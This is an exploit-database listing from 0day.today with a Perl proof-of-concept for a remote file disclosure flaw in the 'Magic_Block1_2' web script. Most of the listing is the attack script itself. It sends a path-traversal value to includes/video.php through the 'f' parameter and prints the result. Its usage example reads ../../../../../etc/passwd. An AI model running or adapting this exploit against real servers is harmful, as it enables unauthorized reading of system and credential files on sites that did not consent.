[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Magic_Block1_2 remote file disclosure exploit vulnerability

Author
JiKo
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10842
Category
web applications
Date add
10-02-2010
Platform
unsorted
===========================================================
Magic_Block1_2 remote file disclosure exploit vulnerability
===========================================================

links : http://mshaer.net/magic_blocks1_2.zip

#!/usr/bin/perl
#***********************************************************************************#
# Exploitation Remote File Disclosure Vulnerability By JIKO                                                      #
#***********************************************************************************#
# Author   : Jiko                                    
#***********************************************************************************#
#script http://mshaer.net/magic_blocks1_2.zip
#magic-blocks arab script
#simple exploit download file
#http://No-ExploiT.Com/includes/video.php?f=[ffile] with save as or a programme for download ex: IDM
use HTTP::Request;
use LWP::Simple;

sub header()
{

print "
-------------------------------------------------------------------\n
Coded by: JIKO\n
Usage   : $0 [traget] [FILE]\n
Example : $0 http://no-exploit.com/ ../../../../../etc/passwd\n
-----------------------------[No-ExploiT.Com]-------------------------------\n
";
}

$site= @ARGV[0];
$file= @ARGV[1];
$vul= "/includes/video.php";
$var="f";
if($ARGV[0] && $ARGV[1]){
header();
print "exploit No-exploit.com :\n";
getprint("$site/$vul?$var=$file");
}
else
{
    header();
    }




#  0day.today [2024-10-05]  #